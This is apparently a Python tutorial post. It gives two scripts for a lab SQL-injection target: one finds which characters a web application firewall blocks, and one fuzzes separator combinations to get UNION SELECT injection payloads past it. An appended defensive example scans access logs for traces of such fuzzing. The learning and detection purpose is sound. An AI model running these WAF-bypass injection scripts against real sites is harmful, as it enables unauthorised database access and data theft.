Python Learning Path: Day 6


Overview

Simple scripts for working with a WAF: 1. detect which characters it blocks; 2. batch fuzz testing.

1

```python
import requests

# Keywords and characters to probe; each one is sent on its own to see whether the WAF rejects it.
# The two backslash entries are written as escaped backslashes so that the list parses.
sql_char = ['select', 'union', 'and', 'or', '', 'select union', 'sleep', 'like', 'group', 'order', 'by', 'ascii',
            'updatexml', 'handler', 'insert', '\\', '\\ ', '@', 'all', '#', '-', '"', ')', '--', '+', '=', '/', ' ']

url = "http://192.168.126.132:5001/sqli/less-1/index.php/"
header = {
    'Host': '192.168.126.132:5001',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded'
}

for char in sql_char:
    # The body is sent as a raw string, so the probe character is not URL-encoded.
    post_data = "query=test" + char + "&submit2=sbumit"
    res = requests.post(url, data=post_data, headers=header)
    # The WAF answers blocked input with a page containing "Illegal Char".
    if 'Illegal Char' in res.text:
        print("过滤字符: {0}".format(char))  # "filtered character"
    else:
        print("通过: {0}".format(char))  # "passed"
```

2

```python
import requests

# Candidate separators to place between "union" and "select".
fuzz_a = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00', '%0a', '%23', '%20']
fuzz_b = ['', ' ']
fuzz_c = ['%0a', '%0b', '%0c', '%0d', '%0e', '%0f', '%0g', '%0h', '%0i', '%0j', '%0h']
FUZZ = fuzz_a + fuzz_b + fuzz_c


def work(url):
    # Try every three-element combination of separators.
    for a in FUZZ:
        for b in FUZZ:
            for c in FUZZ:
                exp = url + "%27%20union" + "--%20asdasd" + a + b + c + "select" + "%201,2,3%20%23"
                response = requests.get(url=exp).text
                # Print only the requests whose response shows neither the WAF block page nor an error.
                if "waf" not in response and "error" not in response:
                    print(exp)


if __name__ == '__main__':
    url = "http://192.168.126.132:5001/sqli/Less-1/index.php?id=-1"
    work(url)
```
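Added example (not part of the original post): the defender's view of the second script above. It scans web access-log lines for the traces such a fuzzing run leaves behind: `union ... select` after URL-decoding, decoded control characters, and malformed escapes such as `%0g`. The log lines, client addresses and the threshold are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the original page); client addresses are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jun/2022:10:00:01 +0000] "GET /sqli/Less-1/index.php?id=-1%27%20union--%20asdasd%0a%0b%20select%201,2,3%20%23 HTTP/1.1" 200 512
10.0.0.5 - - [03/Jun/2022:10:00:01 +0000] "GET /sqli/Less-1/index.php?id=-1%27%20union--%20asdasd/*%0g%0dselect%201,2,3%20%23 HTTP/1.1" 403 98
10.0.0.5 - - [03/Jun/2022:10:00:02 +0000] "GET /sqli/Less-1/index.php?id=-1%27%20union--%20asdasd%00%0c*select%201,2,3%20%23 HTTP/1.1" 403 98
10.0.0.9 - - [03/Jun/2022:10:00:03 +0000] "GET /sqli/Less-1/index.php?id=7 HTTP/1.1" 200 640
10.0.0.9 - - [03/Jun/2022:10:00:04 +0000] "GET /news.php?title=credit%20union%20report HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
UNION_SELECT = re.compile(r"union[\s\S]{0,64}?select", re.I)  # deliberately loose
CONTROL = re.compile(r"[\x00-\x08\x0a-\x1f]")                 # decoded control bytes, tab excluded
BAD_ESCAPE = re.compile(r"%(?![0-9a-fA-F]{2})")               # e.g. %0g is not a valid escape


def classify(raw_query):
    """Return the set of fuzzing indicators present in one raw query string."""
    decoded = unquote(raw_query)  # malformed escapes are left as literal text
    found = {"union-select": UNION_SELECT.search(decoded),
             "control-char": CONTROL.search(decoded),
             "malformed-escape": BAD_ESCAPE.search(raw_query)}
    return {name for name, hit in found.items() if hit}


def fuzz_sources(log_text, threshold=3):
    """Map client -> indicator counts for clients with at least `threshold` flagged requests."""
    flagged, reasons_by_client = Counter(), defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        reasons = classify(urlsplit(m.group(2)).query) if m else set()
        if reasons:
            flagged[m.group(1)] += 1
            reasons_by_client[m.group(1)].update(reasons)
    return {c: dict(reasons_by_client[c]) for c, n in flagged.items() if n >= threshold}


if __name__ == "__main__":
    print(fuzz_sources(SAMPLE_LOG))
```

Counting flagged requests per client, rather than alerting on a single match, is what separates a burst of generated variants from a one-off odd request.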
Original article: https://outofmemory.cn/langs/1189390.html
